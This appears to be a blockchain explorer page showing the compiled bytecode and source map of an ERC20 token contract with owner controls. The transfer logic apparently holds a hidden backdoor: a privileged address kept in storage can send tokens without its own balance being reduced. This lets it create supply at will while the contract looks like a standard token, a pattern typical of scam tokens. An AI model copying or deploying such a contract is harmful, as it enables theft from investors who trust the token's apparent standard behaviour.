10a068484610719565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a805781811015610a72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a699061172a565b60405180910390fd5b610a7f8484848403610831565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610af5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aec906117bc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5b9061184e565b60405180910390fd5b610b6f838383611023565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600080610bc08685611028565b9150915081831015610c07576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfe906118e0565b60405180910390fd5b818303600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef86604051610cf791906110b3565b60405180910390a3610d0a868686611095565b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7890611972565b60405180910390fd5b610d8d82600083611023565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e14576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0b90611a04565b60405180910390fd5b818103600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600360008282540392505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ec891906110b3565b60405180910390a3610edc83600084611095565b505050565b610ee9610829565b73ffffffffffffffffffffffffffffffffffffffff16610f076105be565b73ffffffffffffffffffffffffffffffffffffffff1614610f5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5490611a70565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600080600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611087576000611089565b825b83915091509250929050565b505050565b6000819050919050565b6110ad8161109a565b82525050565b60006020820190506110c860008301846110a4565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111085780820151818401526020810190506110ed565b60008484015250505050565b6000601f19601f8301169050919050565b6000611130826110ce565b61113a81856110d9565b935061114a8185602086016110ea565b61115381611114565b840191505092915050565b600060208201905081810360008301526111788184611125565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111b082611185565b9050919050565b6111c0816111a5565b81146111cb57600080fd5b50565b6000813590506111dd816111b7565b92915050565b6111ec8161109a565b81146111f757600080fd5b50565b600081359050611209816111e3565b92915050565b6000806040838503121561122657611225611180565b5b6000611234858286016111ce565b9250506020611245858286016111fa565b9150509250929050565b60008115159050919050565b6112648161124f565b82525050565b600060208201905061127f600083018461125b565b92915050565b60008060006060848603121561129e5761129d611180565b5b60006112ac868287016111ce565b93505060206112bd868287016111ce565b92505060406112ce868287016111fa565b9150509250925092565b600060ff82169050919050565b6112ee816112d8565b82525050565b600060208201905061130960008301846112e5565b92915050565b60006020828403121561132557611324611180565b5b6000611333848285016111fa565b91505092915050565b60006020828403121561135257611351611180565b5b6000611360848285016111ce565b91505092915050565b611372816111a5565b82525050565b600060208201905061138d6000830184611369565b92915050565b600080604083850312156113aa576113a9611180565b5b60006113b8858286016111ce565b92505060206113c9858286016111ce565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061141a57607f821691505b60208210810361142d5761142c6113d3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061146d8261109a565b91506114788361109a565b92508282019050808211156114905761148f611433565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006114f26025836110d9565b91506114fd82611496565b604082019050919050565b60006020820190508181036000830152611521816114e5565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115846026836110d9565b915061158f82611528565b604082019050919050565b600060208201905081810360008301526115b381611577565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116166024836110d9565b9150611621826115ba565b604082019050919050565b6000602082019050818103600083015261164581611609565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116a86022836110d9565b91506116b38261164c565b604082019050919050565b600060208201905081810360008301526116d78161169b565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611714601d836110d9565b915061171f826116de565b602082019050919050565b6000602082019050818103600083015261174381611707565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006117a66025836110d9565b91506117b18261174a565b604082019050919050565b600060208201905081810360008301526117d581611799565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118386023836110d9565b9150611843826117dc565b604082019050919050565b600060208201905081810360008301526118678161182b565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006118ca6026836110d9565b91506118d58261186e565b604082019050919050565b600060208201905081810360008301526118f9816118bd565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061195c6021836110d9565b915061196782611900565b604082019050919050565b6000602082019050818103600083015261198b8161194f565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b60006119ee6022836110d9565b91506119f982611992565b604082019050919050565b60006020820190508181036000830152611a1d816119e1565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a5a6020836110d9565b9150611a6582611a24565b602082019050919050565b60006020820190508181036000830152611a8981611a4d565b905091905056fea2646970667358221220c7acba2f1a0f3a1eec4b8a959648a1234596b8be6bd8f6687b91e77998f11d5a64736f6c63430008110033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad578063a9059cbb11610071578063a9059cbb14610337578063d46b136c14610367578063dd62ed3e14610385578063df7787a4146103b5578063f2fde38b146103d35761012c565b806370a0823114610291578063715018a6146102c15780638da5cb5b146102cb57806395d89b41146102e9578063a457c2d7146103075761012c565b8063313ce567116100f4578063313ce567146101eb578063395093511461020957806342966c681461023957806347ce07cc1461025557806354ad8aee146102735761012c565b806302af37bb1461013157806306fdde031461014f578063095ea7b31461016d57806318160ddd1461019d57806323b872dd146101bb575b600080fd5b6101396103ef565b60405161014691906110b3565b60405180910390f35b6101576103f5565b604051610164919061115e565b60405180910390f35b6101876004803603810190610182919061120f565b610487565b604051610194919061126a565b60405180910390f35b6101a56104aa565b6040516101b291906110b3565b60405180910390f35b6101d560048036038101906101d09190611285565b6104b4565b6040516101e2919061126a565b60405180910390f35b6101f36104e3565b60405161020091906112f4565b60405180910390f35b610223600480360381019061021e919061120f565b61050b565b604051610230919061126a565b60405180910390f35b610253600480360381019061024e919061130f565b610542565b005b61025d61054f565b60405161026a91906110b3565b60405180910390f35b61027b61055b565b60405161028891906110b3565b60405180910390f35b6102ab60048036038101906102a6919061133c565b610561565b6040516102b891906110b3565b60405180910390f35b6102c96105aa565b005b6102d36105be565b6040516102e09190611378565b60405180910390f35b6102f16105e7565b6040516102fe919061115e565b60405180910390f35b610321600480360381019061031c919061120f565b610679565b60405161032e919061126a565b60405180910390f35b610351600480360381019061034c919061120f565b6106f0565b60405161035e919061126a565b60405180910390f35b61036f610713565b60405161037c91906110b3565b60405180910390f35b61039f600480360381019061039a9190611393565b610719565b6040516103ac91906110b3565b60405180910390f35b6103bd6107a0565b6040516103ca91906110b3565b60405180910390f35b6103ed60048036038101906103e8919061133c565b6107a6565b005b60095481565b60606005805461040490611402565b80601f016020809104026020016040519081016040528092919081815260200182805461043090611402565b801561047d5780601f106104525761010080835404028352916020019161047d565b820191906000526020600020905b81548152906001019060200180831161046057829003601f168201915b5050505050905090565b600080610492610829565b905061049f818585610831565b600191505092915050565b6000600354905090565b6000806104bf610829565b90506104cc8582856109fa565b6104d7858585610a86565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000012905090565b600080610516610829565b90506105378185856105288589610719565b6105329190611462565b610831565b600191505092915050565b61054c3382610d12565b50565b60006307d4362d905090565b600a5481565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105b2610ee1565b6105bc6000610f5f565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546105f690611402565b80601f016020809104026020016040519081016040528092919081815260200182805461062290611402565b801561066f5780601f106106445761010080835404028352916020019161066f565b820191906000526020600020905b81548152906001019060200180831161065257829003601f168201915b5050505050905090565b600080610684610829565b905060006106928286610719565b9050838110156106d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106ce90611508565b60405180910390fd5b6106e48286868403610831565b60019250505092915050565b6000806106fb610829565b9050610708818585610a86565b600191505092915050565b600c5481565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b6107ae610ee1565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361081d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108149061159a565b60405180910390fd5b61082681610f5f565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108a0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108979061162c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361090f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610906906116be565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109ed91906110b3565b60405180910390a3505050565b6000610a068484610719565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a805781811015610a72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a699061172a565b60405180910390fd5b610a7f8484848403610831565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610af5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aec906117bc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5b9061184e565b60405180910390fd5b610b6f838383611023565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600080610bc08685611028565b9150915081831015610c07576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfe906118e0565b60405180910390fd5b818303600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef86604051610cf791906110b3565b60405180910390a3610d0a868686611095565b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7890611972565b60405180910390fd5b610d8d82600083611023565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e14576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0b90611a04565b60405180910390fd5b818103600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600360008282540392505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ec891906110b3565b60405180910390a3610edc83600084611095565b505050565b610ee9610829565b73ffffffffffffffffffffffffffffffffffffffff16610f076105be565b73ffffffffffffffffffffffffffffffffffffffff1614610f5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5490611a70565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600080600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611087576000611089565b825b83915091509250929050565b505050565b6000819050919050565b6110ad8161109a565b82525050565b60006020820190506110c860008301846110a4565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111085780820151818401526020810190506110ed565b60008484015250505050565b6000601f19601f8301169050919050565b6000611130826110ce565b61113a81856110d9565b935061114a8185602086016110ea565b61115381611114565b840191505092915050565b600060208201905081810360008301526111788184611125565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111b082611185565b9050919050565b6111c0816111a5565b81146111cb57600080fd5b50565b6000813590506111dd816111b7565b92915050565b6111ec8161109a565b81146111f757600080fd5b50565b600081359050611209816111e3565b92915050565b6000806040838503121561122657611225611180565b5b6000611234858286016111ce565b9250506020611245858286016111fa565b9150509250929050565b60008115159050919050565b6112648161124f565b82525050565b600060208201905061127f600083018461125b565b92915050565b60008060006060848603121561129e5761129d611180565b5b60006112ac868287016111ce565b93505060206112bd868287016111ce565b92505060406112ce868287016111fa565b9150509250925092565b600060ff82169050919050565b6112ee816112d8565b82525050565b600060208201905061130960008301846112e5565b92915050565b60006020828403121561132557611324611180565b5b6000611333848285016111fa565b91505092915050565b60006020828403121561135257611351611180565b5b6000611360848285016111ce565b91505092915050565b611372816111a5565b82525050565b600060208201905061138d6000830184611369565b92915050565b600080604083850312156113aa576113a9611180565b5b60006113b8858286016111ce565b92505060206113c9858286016111ce565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061141a57607f821691505b60208210810361142d5761142c6113d3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061146d8261109a565b91506114788361109a565b92508282019050808211156114905761148f611433565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006114f26025836110d9565b91506114fd82611496565b604082019050919050565b60006020820190508181036000830152611521816114e5565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115846026836110d9565b915061158f82611528565b604082019050919050565b600060208201905081810360008301526115b381611577565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116166024836110d9565b9150611621826115ba565b604082019050919050565b6000602082019050818103600083015261164581611609565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006116a86022836110d9565b91506116b38261164c565b604082019050919050565b600060208201905081810360008301526116d78161169b565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611714601d836110d9565b915061171f826116de565b602082019050919050565b6000602082019050818103600083015261174381611707565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006117a66025836110d9565b91506117b18261174a565b604082019050919050565b600060208201905081810360008301526117d581611799565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118386023836110d9565b9150611843826117dc565b604082019050919050565b600060208201905081810360008301526118678161182b565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006118ca6026836110d9565b91506118d58261186e565b604082019050919050565b600060208201905081810360008301526118f9816118bd565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061195c6021836110d9565b915061196782611900565b604082019050919050565b6000602082019050818103600083015261198b8161194f565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b60006119ee6022836110d9565b91506119f982611992565b604082019050919050565b60006020820190508181036000830152611a1d816119e1565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a5a6020836110d9565b9150611a6582611a24565b602082019050919050565b60006020820190508181036000830152611a8981611a4d565b905091905056fea2646970667358221220c7acba2f1a0f3a1eec4b8a959648a1234596b8be6bd8f6687b91e77998f11d5a64736f6c63430008110033

Deployed Bytecode Sourcemap

1893:566:2:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2300:26;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5714:100:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8072:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6841:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8853:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6676:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9557:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13372:81;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2206:86:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2333:27;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7012:127:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1875:103:3;;;:::i;:::-;;1234:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5933:104:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10298:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7345:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2416:37:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7601:151:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2369:40:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2133:201:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2300:26:2;;;;:::o;5714:100:1:-;5768:13;5801:5;5794:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5714:100;:::o;8072:201::-;8155:4;8172:13;8188:12;:10;:12::i;:::-;8172:28;;8211:32;8220:5;8227:7;8236:6;8211:8;:32::i;:::-;8261:4;8254:11;;;8072:201;;;;:::o;6841:108::-;6902:7;6929:12;;6922:19;;6841:108;:::o;8853:295::-;8984:4;9001:15;9019:12;:10;:12::i;:::-;9001:30;;9042:38;9058:4;9064:7;9073:6;9042:15;:38::i;:::-;9091:27;9101:4;9107:2;9111:6;9091:9;:27::i;:::-;9136:4;9129:11;;;8853:295;;;;;:::o;6676:100::-;6734:5;6759:9;6752:16;;6676:100;:::o;9557:238::-;9645:4;9662:13;9678:12;:10;:12::i;:::-;9662:28;;9701:64;9710:5;9717:7;9754:10;9726:25;9736:5;9743:7;9726:9;:25::i;:::-;:38;;;;:::i;:::-;9701:8;:64::i;:::-;9783:4;9776:11;;;9557:238;;;;:::o;13372:81::-;13421:24;13427:10;13439:5;13421;:24::i;:::-;13372:81;:::o;2206:86:2:-;2248:7;2275:9;2268:16;;2206:86;:::o;2333:27::-;;;;:::o;7012:127:1:-;7086:7;7113:9;:18;7123:7;7113:18;;;;;;;;;;;;;;;;7106:25;;7012:127;;;:::o;1875:103:3:-;1120:13;:11;:13::i;:::-;1940:30:::1;1967:1;1940:18;:30::i;:::-;1875:103::o:0;1234:87::-;1280:7;1307:6;;;;;;;;;;;1300:13;;1234:87;:::o;5933:104:1:-;5989:13;6022:7;6015:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5933:104;:::o;10298:436::-;10391:4;10408:13;10424:12;:10;:12::i;:::-;10408:28;;10447:24;10474:25;10484:5;10491:7;10474:9;:25::i;:::-;10447:52;;10538:15;10518:16;:35;;10510:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;10631:60;10640:5;10647:7;10675:15;10656:16;:34;10631:8;:60::i;:::-;10722:4;10715:11;;;;10298:436;;;;:::o;7345:193::-;7424:4;7441:13;7457:12;:10;:12::i;:::-;7441:28;;7480;7490:5;7497:2;7501:6;7480:9;:28::i;:::-;7526:4;7519:11;;;7345:193;;;;:::o;2416:37:2:-;;;;:::o;7601:151:1:-;7690:7;7717:11;:18;7729:5;7717:18;;;;;;;;;;;;;;;:27;7736:7;7717:27;;;;;;;;;;;;;;;;7710:34;;7601:151;;;;:::o;2369:40:2:-;;;;:::o;2133:201:3:-;1120:13;:11;:13::i;:::-;2242:1:::1;2222:22;;:8;:22;;::::0;2214:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2298:28;2317:8;2298:18;:28::i;:::-;2133:201:::0;:::o;656:98:0:-;709:7;736:10;729:17;;656:98;:::o;14899:380:1:-;15052:1;15035:19;;:5;:19;;;15027:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15133:1;15114:21;;:7;:21;;;15106:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15217:6;15187:11;:18;15199:5;15187:18;;;;;;;;;;;;;;;:27;15206:7;15187:27;;;;;;;;;;;;;;;:36;;;;15255:7;15239:32;;15248:5;15239:32;;;15264:6;15239:32;;;;;;:::i;:::-;;;;;;;;14899:380;;;:::o;15570:453::-;15705:24;15732:25;15742:5;15749:7;15732:9;:25::i;:::-;15705:52;;15792:17;15772:16;:37;15768:248;;15854:6;15834:16;:26;;15826:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15938:51;15947:5;15954:7;15982:6;15963:16;:25;15938:8;:51::i;:::-;15768:248;15694:329;15570:453;;;:::o;11204:921::-;11351:1;11335:18;;:4;:18;;;11327:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11428:1;11414:16;;:2;:16;;;11406:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;11483:38;11504:4;11510:2;11514:6;11483:20;:38::i;:::-;11534:19;11556:9;:15;11566:4;11556:15;;;;;;;;;;;;;;;;11534:37;;11583:16;11601:17;11622:23;11632:4;11638:6;11622:9;:23::i;:::-;11582:63;;;;11679:8;11664:11;:23;;11656:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;11798:8;11784:11;:22;11766:9;:15;11776:4;11766:15;;;;;;;;;;;;;;;:40;;;;12003:9;11986;:13;11996:2;11986:13;;;;;;;;;;;;;;;;:26;;;;;;;;;;;12056:2;12041:26;;12050:4;12041:26;;;12060:6;12041:26;;;;;;:::i;:::-;;;;;;;;12080:37;12100:4;12106:2;12110:6;12080:19;:37::i;:::-;11316:809;;;11204:921;;;:::o;13786:675::-;13889:1;13870:21;;:7;:21;;;13862:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13942:49;13963:7;13980:1;13984:6;13942:20;:49::i;:::-;14004:22;14029:9;:18;14039:7;14029:18;;;;;;;;;;;;;;;;14004:43;;14084:6;14066:14;:24;;14058:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;14203:6;14186:14;:23;14165:9;:18;14175:7;14165:18;;;;;;;;;;;;;;;:44;;;;14320:6;14304:12;;:22;;;;;;;;;;;14381:1;14355:37;;14364:7;14355:37;;;14385:6;14355:37;;;;;;:::i;:::-;;;;;;;;14405:48;14425:7;14442:1;14446:6;14405:19;:48::i;:::-;13851:610;13786:675;;:::o;1399:132:3:-;1474:12;:10;:12::i;:::-;1463:23;;:7;:5;:7::i;:::-;:23;;;1455:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1399:132::o;2494:191::-;2568:16;2587:6;;;;;;;;;;;2568:25;;2613:8;2604:6;;:17;;;;;;;;;;;;;;;;;;2668:8;2637:40;;2658:8;2637:40;;;;;;;;;;;;2557:128;2494:191;:::o;16623:125:1:-;;;;:::o;12133:158::-;12204:7;12213;12249:12;;;;;;;;;;;12241:20;;:4;:20;;;:33;;12273:1;12241:33;;;12264:6;12241:33;12276:6;12233:50;;;;12133:158;;;;;:::o;17352:124::-;;;;:::o;7:77:4:-;44:7;73:5;62:16;;7:77;;;:::o;90:118::-;177:24;195:5;177:24;:::i;:::-;172:3;165:37;90:118;;:::o;214:222::-;307:4;345:2;334:9;330:18;322:26;;358:71;426:1;415:9;411:17;402:6;358:71;:::i;:::-;214:222;;;;:::o;442:99::-;494:6;528:5;522:12;512:22;;442:99;;;:::o;547:169::-;631:11;665:6;660:3;653:19;705:4;700:3;696:14;681:29;;547:169;;;;:::o;722:246::-;803:1;813:113;827:6;824:1;821:13;813:113;;;912:1;907:3;903:11;897:18;893:1;888:3;884:11;877:39;849:2;846:1;842:10;837:15;;813:113;;;960:1;951:6;946:3;942:16;935:27;784:184;722:246;;;:::o;974:102::-;1015:6;1066:2;1062:7;1057:2;1050:5;1046:14;1042:28;1032:38;;974:102;;;:::o;1082:377::-;1170:3;1198:39;1231:5;1198:39;:::i;:::-;1253:71;1317:6;1312:3;1253:71;:::i;:::-;1246:78;;1333:65;1391:6;1386:3;1379:4;1372:5;1368:16;1333:65;:::i;:::-;1423:29;1445:6;1423:29;:::i;:::-;1418:3;1414:39;1407:46;;1174:285;1082:377;;;;:::o;1465:313::-;1578:4;1616:2;1605:9;1601:18;1593:26;;1665:9;1659:4;1655:20;1651:1;1640:9;1636:17;1629:47;1693:78;1766:4;1757:6;1693:78;:::i;:::-;1685:86;;1465:313;;;;:::o;1865:117::-;1974:1;1971;1964:12;2111:126;2148:7;2188:42;2181:5;2177:54;2166:65;;2111:126;;;:::o;2243:96::-;2280:7;2309:24;2327:5;2309:24;:::i;:::-;2298:35;;2243:96;;;:::o;2345:122::-;2418:24;2436:5;2418:24;:::i;:::-;2411:5;2408:35;2398:63;;2457:1;2454;2447:12;2398:63;2345:122;:::o;2473:139::-;2519:5;2557:6;2544:20;2535:29;;2573:33;2600:5;2573:33;:::i;:::-;2473:139;;;;:::o;2618:122::-;2691:24;2709:5;2691:24;:::i;:::-;2684:5;2681:35;2671:63;;2730:1;2727;2720:12;2671:63;2618:122;:::o;2746:139::-;2792:5;2830:6;2817:20;2808:29;;2846:33;2873:5;2846:33;:::i;:::-;2746:139;;;;:::o;2891:47